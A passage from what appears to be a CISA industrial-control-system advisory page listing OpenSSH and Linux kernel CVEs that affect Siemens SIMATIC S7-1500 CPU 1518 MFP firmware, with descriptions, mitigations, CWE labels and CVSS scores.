CVE-2026-23475, CVE-2026-27135, CVE-2026-31389, CVE-2026-31391, CVE-2026-31396, CVE-2026-31402, CVE-2026-31403, CVE-2026-31411, CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31427, CVE-2026-31428, CVE-2026-31431, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448, CVE-2026-31450, CVE-2026-31452, CVE-2026-31466, CVE-2026-31469, CVE-2026-31485, CVE-2026-31494, CVE-2026-31495, CVE-2026-31496, CVE-2026-31503, CVE-2026-31504, CVE-2026-31507, CVE-2026-31508, CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31533, CVE-2026-31546, CVE-2026-31555, CVE-2026-31563, CVE-2026-31565, CVE-2026-31628, CVE-2026-31634, CVE-2026-31649, CVE-2026-31651, CVE-2026-31658, CVE-2026-31664, CVE-2026-31665, CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31674, CVE-2026-31680, CVE-2026-31682, CVE-2026-31737, CVE-2026-31752, CVE-2026-31761, CVE-2026-31768, CVE-2026-40355, CVE-2026-41989, CVE-2026-43011, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43033, CVE-2026-43035, CVE-2026-43038, CVE-2026-43040, CVE-2026-43057, CVE-2026-43284, CVE-2026-46174, CVE-2026-46300, CVE-2026-46333)</li>
<li>SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) vers:intdot/&gt;=3.1.6 (CVE-2021-41617, CVE-2023-28531, CVE-2023-51384, CVE-2023-52927, CVE-2024-26783, CVE-2024-27056, CVE-2024-28956, CVE-2024-36903, CVE-2024-36927, CVE-2024-42079, CVE-2024-46786, CVE-2024-47736, CVE-2024-47809, CVE-2024-49968, CVE-2024-49994, CVE-2024-49998, CVE-2024-50014, CVE-2024-50063, CVE-2024-50164, CVE-2024-50298, CVE-2024-53124, CVE-2024-53170, CVE-2024-54458, CVE-2024-56631, CVE-2024-56703, CVE-2024-56719, CVE-2024-57917, CVE-2024-57924, CVE-2024-57973, CVE-2024-57977, CVE-2024-57979, CVE-2024-58011, CVE-2024-58016, CVE-2024-58020, CVE-2024-58056, CVE-2024-58058, CVE-2024-58061, CVE-2024-58086, CVE-2025-21645, CVE-2025-21648, CVE-2025-21655, CVE-2025-21676, CVE-2025-21682, CVE-2025-21702, CVE-2025-21705, CVE-2025-21706, CVE-2025-21707, CVE-2025-21718, CVE-2025-21731, CVE-2025-21745, CVE-2025-21758, CVE-2025-21760, CVE-2025-21764, CVE-2025-21765, CVE-2025-21780, CVE-2025-21795, CVE-2025-21796, CVE-2025-21802, CVE-2025-21814, CVE-2025-21846, CVE-2025-21853, CVE-2025-21861, CVE-2025-21864, CVE-2025-21867, CVE-2025-21875, CVE-2025-21887, CVE-2025-21913, CVE-2025-21919, CVE-2025-21925, CVE-2025-21926, CVE-2025-21938, CVE-2025-21959, CVE-2025-21999, CVE-2025-22005, CVE-2025-22015, CVE-2025-22055, CVE-2025-22056, CVE-2025-22060, CVE-2025-22083, CVE-2025-22090, CVE-2025-22095, CVE-2025-22107, CVE-2025-22111, CVE-2025-22121, CVE-2025-23136, CVE-2025-23143, CVE-2025-37785, CVE-2025-37909, CVE-2025-37917, CVE-2025-37945, CVE-2025-37959, CVE-2025-37964, CVE-2025-37972, CVE-2025-37980, CVE-2025-38125, CVE-2025-38162, CVE-2025-38192, CVE-2025-38201, CVE-2025-38232, CVE-2025-38322, CVE-2025-38591, CVE-2025-38614, CVE-2025-38681, CVE-2025-38704, CVE-2025-38721, CVE-2025-38725, CVE-2025-38727, CVE-2025-38732, CVE-2025-38736, CVE-2025-39681, CVE-2025-39691, CVE-2025-39721, CVE-2025-39748, CVE-2025-39756, CVE-2025-39764, CVE-2025-39770, CVE-2025-39773, CVE-2025-39782, CVE-2025-39795, CVE-2025-39826, CVE-2025-39827, CVE-2025-39845, CVE-2025-39866, CVE-2025-39871, CVE-2025-39931, CVE-2025-39953, CVE-2025-39955, CVE-2025-39964, CVE-2025-39977, CVE-2025-39978, CVE-2025-39980, CVE-2025-40022, CVE-2025-40070, CVE-2025-40078, CVE-2025-40080, CVE-2025-40105, CVE-2025-40135, CVE-2025-40149, CVE-2025-40219, CVE-2025-40261, CVE-2025-40300, CVE-2025-61984, CVE-2025-61985, CVE-2025-68206, CVE-2025-68261, CVE-2025-68264, CVE-2025-68265, CVE-2025-68266, CVE-2025-68291, CVE-2025-68337, CVE-2025-68349, CVE-2025-68363, CVE-2025-68371, CVE-2025-68724, CVE-2025-68725, CVE-2025-68742, CVE-2025-68764, CVE-2025-68773, CVE-2025-68776, CVE-2025-68782, CVE-2025-68787, CVE-2025-68788, CVE-2025-68798, CVE-2025-68803, CVE-2025-68814, CVE-2025-68816, CVE-2025-68818, CVE-2025-68820, CVE-2025-71064, CVE-2025-71075, CVE-2025-71079, CVE-2025-71085, CVE-2025-71086, CVE-2025-71088, CVE-2025-71095, CVE-2025-71097, CVE-2025-71098, CVE-2025-71104, CVE-2025-71112, CVE-2025-71113, CVE-2025-71114, CVE-2025-71120, CVE-2025-71123, CVE-2025-71131, CVE-2025-71161, CVE-2025-71162, CVE-2025-71163, CVE-2025-71185, CVE-2025-71186, CVE-2025-71189, CVE-2025-71190, CVE-2025-71191, CVE-2025-71197, CVE-2025-71221, CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2026-3497, CVE-2026-22977, CVE-2026-22979, CVE-2026-22980, CVE-2026-22982, CVE-2026-22992, CVE-2026-22994, CVE-2026-23003, CVE-2026-23005, CVE-2026-23010, CVE-2026-23011, CVE-2026-23019, CVE-2026-23026, CVE-2026-23038, CVE-2026-23054, CVE-2026-23060, CVE-2026-23083, CVE-2026-23084, CVE-2026-23086, CVE-2026-23087, CVE-2026-23095, CVE-2026-23100, CVE-2026-23103, CVE-2026-23110, CVE-2026-23111, CVE-2026-23113, CVE-2026-23154, CVE-2026-23204, CVE-2026-23231, CVE-2026-23242, CVE-2026-23243, CVE-2026-23245, CVE-2026-23270, CVE-2026-23271, CVE-2026-23273, CVE-2026-23274, CVE-2026-23277, CVE-2026-23284, CVE-2026-23287, CVE-2026-23290, CVE-2026-23293, CVE-2026-23300, CVE-2026-23304, CVE-2026-23319, CVE-2026-23321, CVE-2026-23335, CVE-2026-23340, CVE-2026-23343, CVE-2026-23351, CVE-2026-23359, CVE-2026-23365, CVE-2026-23368, CVE-2026-23370, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381, CVE-2026-23391, CVE-2026-23392, CVE-2026-23397, CVE-2026-23398, CVE-2026-23414, CVE-2026-23422, CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23446, CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454, CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23463, CVE-2026-23474, CVE-2026-23475, CVE-2026-27135, CVE-2026-31389, CVE-2026-31391, CVE-2026-31396, CVE-2026-31402, CVE-2026-31403, CVE-2026-31411, CVE-2026-31414, CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421, CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31427, CVE-2026-31428, CVE-2026-31431, CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448, CVE-2026-31450, CVE-2026-31452, CVE-2026-31466, CVE-2026-31469, CVE-2026-31485, CVE-2026-31494, CVE-2026-31495, CVE-2026-31496, CVE-2026-31503, CVE-2026-31504, CVE-2026-31507, CVE-2026-31508, CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31533, CVE-2026-31546, CVE-2026-31555, CVE-2026-31563, CVE-2026-31565, CVE-2026-31628, CVE-2026-31634, CVE-2026-31649, CVE-2026-31651, CVE-2026-31658, CVE-2026-31664, CVE-2026-31665, CVE-2026-31669, CVE-2026-31670, CVE-2026-31671, CVE-2026-31674, CVE-2026-31680, CVE-2026-31682, CVE-2026-31737, CVE-2026-31752, CVE-2026-31761, CVE-2026-31768, CVE-2026-40355, CVE-2026-41989, CVE-2026-43011, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43033, CVE-2026-43035, CVE-2026-43038, CVE-2026-43040, CVE-2026-43057, CVE-2026-43284, CVE-2026-46174, CVE-2026-46300, CVE-2026-46333)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 9.8</td>
<td>Siemens</td>
<td>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</td>
<td>Missing Encryption of Sensitive Data, Missing Critical Step in Authentication, Improper Input Validation, Exposure of Sensitive Information in Shared Microarchitectural Structures during Transient Execution, Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'), NULL Pointer Dereference, Improper Resource Shutdown or Release, Integer Overflow or Wraparound, Use of Uninitialized Variable, Improper Enforcement of Behavioral Workflow, Use After Free, Loop with Unreachable Exit Condition ('Infinite Loop'), Reachable Assertion, Improper Locking, Memory Allocation with Excessive Size Value, Use of Uninitialized Resource, Missing Release of Memory after Effective Lifetime, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Improper Resource Locking, Out-of-bounds Write, Out-of-bounds Read, Incomplete Cleanup, Divide By Zero, Uncontrolled Recursion, Race Condition within a Thread, Missing Release of Resource after Effective Lifetime, Improper Update of Reference Count, Missing Default Case in Multiple Condition Expression, Improper Following of Specification by Caller, Exposure of Sensitive Information Due to Incompatible Policies, Expired Pointer Dereference, Incorrect Type Conversion or Cast, Multiple Releases of Same Resource or Handle, Transmission of Private Resources into a New Sphere ('Resource Leak'), Improper Handling of Invalid Use of Special Elements, Improper Neutralization of Null Byte or NUL Character, Improper Handling of Missing Special Element, Time-of-check Time-of-use (TOCTOU) Race Condition, Missing Initialization of Resource, Incorrect Privilege Assignment, Trust of System Event Data, Use of Externally-Controlled Format String, Unchecked Return Value, Signal Handler Race Condition, Incorrect Conversion between Numeric Types, Active Debug Code, Buffer Underwrite ('Buffer Underflow'), Incorrect Synchronization, Improper Handling of Structural Elements, Improper Validation of Specified Index, Position, or Offset in Input, Incorrect Calculation of Buffer Size, Operation on a Resource after Expiration or Release, Access of Uninitialized Pointer, Improper Validation of Specified Type of Input, Plaintext Storage of a Password, Improper Handling of Length Parameter Inconsistency, Missing Report of Error Condition, Missing Synchronization, Deadlock, Buffer Access with Incorrect Length Value, Untrusted Pointer Dereference, Incorrect Resource Transfer Between Spheres, Release of Invalid Pointer or Reference, Misinterpretation of Input, Improper Null Termination, Incomplete Internal State Distinction, Access of Resource Using Incompatible Type ('Type Confusion'), Improperly Implemented Security Check for Standard, Write-what-where Condition, Improper Privilege Management</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2021-41617</a></h3>
<div class="csaf-accordion-content">
<p>sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2021-41617">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/311.html">CWE-311 Missing Encryption of Sensitive Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-28531</a></h3>
<div class="csaf-accordion-content">
<p>ssh-add in OpenSSH before 9.3 adds smartcard keys to ssh-agent without the intended per-hop destination constraints. The earliest affected version is 8.9.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-28531">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/311.html">CWE-311 Missing Encryption of Sensitive Data</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-51384</a></h3>
<div class="csaf-accordion-content">
<p>In ssh-agent in OpenSSH before 9.6, certain destination constraints can be incompletely applied. When destination constraints are specified during addition of PKCS#11-hosted private keys, these constraints are only applied to the first key, even if a PKCS#11 token returns multiple keys.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-51384">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/304.html">CWE-304 Missing Critical Step in Authentication</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-52927</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: allow exp not to be removed in nf_ct_find_expectation Currently nf_conntrack_in() calling nf_ct_find_expectation() will remove the exp from the hash table. However, in some scenario, we expect the exp not to be removed when the created ct will not be confirmed, like in OVS and TC conntrack in the following patches. This patch allows exp not to be removed by setting IPS_CONFIRMED in the status of the tmpl.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-52927">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-26783</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/vmscan: fix a bug calling wakeup_kswapd() with a wrong zone index With numa balancing on, when a numa system is running where a numa node doesn't have its local memory so it has no managed zones, the following oops has been observed. It's because wakeup_kswapd() is called with a wrong zone index, -1. Fixed it by checking the index before calling wakeup_kswapd(). &gt; BUG: unable to handle page fault for address: 00000000000033f3 &gt; #PF: supervisor read access in kernel mode &gt; #PF: error_code(0x0000) - not-present page &gt; PGD 0 P4D 0 &gt; Oops: 0000 [#1] PREEMPT SMP NOPTI &gt; CPU: 2 PID: 895 Comm: masim Not tainted 6.6.0-dirty #255 &gt; Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS &gt; rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 &gt; RIP: 0010:wakeup_kswapd (./linux/mm/vmscan.c:7812) &gt; Code: (omitted) &gt; RSP: 0000:ffffc90004257d58 EFLAGS: 00010286 &gt; RAX: ffffffffffffffff RBX: ffff88883fff0480 RCX: 0000000000000003 &gt; RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88883fff0480 &gt; RBP: ffffffffffffffff R08: ff0003ffffffffff R09: ffffffffffffffff &gt; R10: ffff888106c95540 R11: 0000000055555554 R12: 0000000000000003 &gt; R13: 0000000000000000 R14: 0000000000000000 R15: ffff88883fff0940 &gt; FS: 00007fc4b8124740(0000) GS:ffff888827c00000(0000) knlGS:0000000000000000 &gt; CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 &gt; CR2: 00000000000033f3 CR3: 000000026cc08004 CR4: 0000000000770ee0 &gt; DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 &gt; DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 &gt; PKRU: 55555554 &gt; Call Trace: &gt; &gt; ? __die &gt; ? page_fault_oops &gt; ? __pte_offset_map_lock &gt; ? exc_page_fault &gt; ? asm_exc_page_fault &gt; ? wakeup_kswapd &gt; migrate_misplaced_page &gt; __handle_mm_fault &gt; handle_mm_fault &gt; do_user_addr_fault &gt; exc_page_fault &gt; asm_exc_page_fault &gt; RIP: 0033:0x55b897ba0808 &gt; Code: (omitted) &gt; RSP: 002b:00007ffeefa821a0 EFLAGS: 00010287 &gt; RAX: 000055b89983acd0 RBX: 00007ffeefa823f8 RCX: 000055b89983acd0 &gt; RDX: 00007fc2f8122010 RSI: 0000000000020000 RDI: 000055b89983acd0 &gt; RBP: 00007ffeefa821a0 R08: 0000000000000037 R09: 0000000000000075 &gt; R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000000 &gt; R13: 00007ffeefa82410 R14: 000055b897ba5dd8 R15: 00007fc4b8340000 &gt;</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-26783">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2024-27056</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: ensure offloading TID queue exists The resume code path assumes that the TX queue for the offloading TID has been configured. At resume time it then tries to sync the write pointer as it may have been updated by the firmware. In the unusual event that no packets have been send on TID 0, the queue will not have been allocated and this causes a crash. Fix this by ensuring the queue exist at suspend time.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-27056">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
